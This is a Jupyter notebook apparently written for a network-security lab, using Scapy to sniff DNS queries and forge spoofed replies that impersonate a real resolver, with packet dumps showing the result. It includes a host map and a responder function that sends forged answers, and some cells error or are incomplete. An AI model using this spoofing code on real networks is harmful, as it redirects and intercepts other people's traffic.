In [1]:
from scapy.all import DNS, DNSQR, DNSRR, IP, IPv6, send, sniff, sr1, UDP, Ether
import scapy.all

In [2]:
# 10.6.6.6,foo.example.com
# 10.6.6.7,bar.example.com
# 10.6.6.8,www.cs.uic.edu

In [3]:
hosts = {
    "foo.example.com": "10.6.6.6",
    "bar.example.com": "10.6.6.7",
    "www.cs.uic.edu": "10.6.6.8",
    "pornhub.com": "127.0.0.1"
}
pack = []

In [13]:
from netfilterqueue import NetfilterQueue

ModuleNotFoundError: No module named 'netfilterqueue'

In [232]:
pkt = pack[0]
_IP = scapy.all.IP
try:
    pkt[IP]
except IndexError:
    _IP = scapy.all.IPv6

cap_domain = str(pkt[DNSQR].qname)[2:len(str(pkt[DNSQR].qname))-2]
fake = Ether(src=pkt[Ether].dst, dst=pkt[Ether].src) / _IP(src=pkt[_IP].dst, dst=pkt[_IP].src) / UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / DNS(id=pkt[DNS].id,qd=pkt[DNS].qd,aa=1,qr=1,ancount=1,ar=pkt[DNS].ar, an=DNSRR(rrname=pkt[DNSQR].qname,rdata=hosts[cap_domain]))
fake.show()

###[ Ethernet ]### 
  dst       = 78:4f:43:72:e8:94
  src       = 70:4f:b8:95:cc:cf
  type      = IPv6
###[ IPv6 ]### 
     version   = 6
     tc        = 0
     fl        = 0
     plen      = None
     nh        = UDP
     hlim      = 64
     src       = 2001:558:feed::1
     dst       = 2601:241:8980:6b30:7050:da99:d291:7dcc
###[ UDP ]### 
        sport     = domain
        dport     = 59265
        len       = None
        chksum    = None
###[ DNS ]### 
           id        = 55500
           qr        = 1
           opcode    = QUERY
           aa        = 1
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 1
           nscount   = 0
           arcount   = 1
           \qd        \
            |###[ DNS Question Record ]### 
            |  qname     = 'pornhub.com.'
            |  qtype     = A
            |  

In [12]:
pack = []

def isQuery(pkt):
    pack.append(pkt)
    domain = str(pkt[DNSQR].qname)[2:len(str(pkt[DNSQR].qname))-2]
    
    if (pkt[DNS].qr == 1 and domain in hosts):
        print("actual")
        print(pkt.show())
    
    return pkt[DNS].qr == 0 and domain in hosts

def dns_responder(pkt):
    if (isQuery(pkt)):
        cap_domain = str(pkt[DNSQR].qname)[2:len(str(pkt[DNSQR].qname))-2]
        print(cap_domain)
        
        reply = Ether()/\
            IPv6(src=pkt.getlayer(1).dst, dst=pkt.getlayer(1).src)/\
            UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
            DNS(id=pkt.getlayer(2).id, aa=0, ra=1, qr=1, cd=0, qdcount=1, ancount=1, arcount=1,
                qd=DNSQR(qname=pkt[DNSQR].qname, qtype='A', qclass=0x0001),
                an=DNSRR(rrname=pkt.getlayer(2).qd.qname, rdata='127.0.0.1', ttl=10, type='A', rclass=0x0001),
                ar
               )
        
        print("fake")
        print(reply.show())
        
        send(reply, iface='en0')
        return;
        
    
        
# sniff(iface="en0", filter="port 53", prn=lambda x: pack.append(x))
# sniff(iface="en0", filter="port 53", prn=dns_responder)
q = NetfilterQueue()


pornhub.com
fake
###[ Ethernet ]### 
  dst       = ff:ff:ff:ff:ff:ff
  src       = 00:00:00:00:00:00
  type      = IPv6
###[ IPv6 ]### 
     version   = 6
     tc        = 0
     fl        = 0
     plen      = None
     nh        = UDP
     hlim      = 64
     src       = 2001:558:feed::1
     dst       = 2601:241:8980:6b30:397f:e7c6:320b:a52
###[ UDP ]### 
        sport     = domain
        dport     = 59715
        len       = None
        chksum    = None
###[ DNS ]### 
           id        = 9497
           qr        = 1
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 1
           nscount   = 0
           arcount   = 1
           \qd        \
            |###[ DNS Question Record ]### 
            |  qname     = 'pornhub.com.'
            |  qtype     = A


<Sniffed: TCP:0 UDP:142 ICMP:0 Other:0>

In [231]:
pack[0].show()

###[ Ethernet ]### 
  dst       = 70:4f:b8:95:cc:cf
  src       = 78:4f:43:72:e8:94
  type      = IPv6
###[ IPv6 ]### 
     version   = 6
     tc        = 0
     fl        = 769418
     plen      = 48
     nh        = UDP
     hlim      = 64
     src       = 2601:241:8980:6b30:7050:da99:d291:7dcc
     dst       = 2001:558:feed::1
###[ UDP ]### 
        sport     = 59265
        dport     = domain
        len       = 48
        chksum    = 0x81be
###[ DNS ]### 
           id        = 55500
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 1
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 1
           \qd        \
            |###[ DNS Question Record ]### 
            |  qname     = 'pornhub.com.'
            |  qtype     = A
            

In [215]:
pack[1].show()

###[ Ethernet ]### 
  dst       = 78:4f:43:72:e8:94
  src       = 70:4f:b8:95:cc:cf
  type      = IPv6
###[ IPv6 ]### 
     version   = 6
     tc        = 0
     fl        = 0
     plen      = 64
     nh        = UDP
     hlim      = 58
     src       = 2001:558:feed::1
     dst       = 2601:241:8980:6b30:7050:da99:d291:7dcc
###[ UDP ]### 
        sport     = domain
        dport     = 54072
        len       = 64
        chksum    = 0x10c3
###[ DNS ]### 
           id        = 46092
           qr        = 1
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 1
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 1
           nscount   = 0
           arcount   = 1
           \qd        \
            |###[ DNS Question Record ]### 
            |  qname     = 'pornhub.com.'
            |  qtype     = A
            |  qc

In [217]:
pkt = pack[0]
_IP = scapy.all.IP
try:
    pkt[IP]
except IndexError:
    _IP = scapy.all.IPv6

cap_domain = str(pkt[DNSQR].qname)[2:len(str(pkt[DNSQR].qname))-2]
fake = Ether(src=pkt[Ether].dst, dst=pkt[Ether].src) / _IP(src=pkt[_IP].dst, dst=pkt[_IP].src) / UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / DNS(id=pkt[DNS].id,qd=pkt[DNS].qd,aa=1,qr=1,ancount=1,ar=pkt[DNS].ar, an=DNSRR(rrname=pkt[DNSQR].qname,rdata=hosts[cap_domain]))
fake.show()

###[ Ethernet ]### 
  dst       = 78:4f:43:72:e8:94
  src       = 70:4f:b8:95:cc:cf
  type      = IPv6
###[ IPv6 ]### 
     version   = 6
     tc        = 0
     fl        = 0
     plen      = None
     nh        = UDP
     hlim      = 64
     src       = 2001:558:feed::1
     dst       = 2601:241:8980:6b30:7050:da99:d291:7dcc
###[ UDP ]### 
        sport     = domain
        dport     = 54072
        len       = None
        chksum    = None
###[ DNS ]### 
           id        = 46092
           qr        = 1
           opcode    = QUERY
           aa        = 1
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 1
           nscount   = 0
           arcount   = 1
           \qd        \
            |###[ DNS Question Record ]### 
            |  qname     = 'pornhub.com.'
            |  qtype     = A
            |  

In [206]:
str(pkt[DNSQR].qname)[2:len(str(pkt[DNSQR].qname))-2]

'pornhub.com'

In [78]:
pack[0].getlayer(0).dst

'70:4f:b8:95:cc:aa'

In [140]:
copy[IPv6]

<IPv6  version=6 tc=0 fl=927790 plen=48 nh=UDP hlim=64 src=2601:241:8980:6b30:7050:da99:d291:7dcc dst=2001:558:feed::1 |<UDP  sport=57776 dport=domain len=48 chksum=0x2bf6 |<DNS  id=13414 qr=0 opcode=QUERY aa=0 tc=0 rd=1 ra=0 z=0 ad=1 cd=0 rcode=ok qdcount=1 ancount=0 nscount=0 arcount=1 qd=<DNSQR  qname='pornhub.com.' qtype=A qclass=IN |> an=None ns=None ar=<DNSRROPT  rrname='.' type=OPT rclass=4096 extrcode=0 version=0 z=0 rdlen=None |> |>>>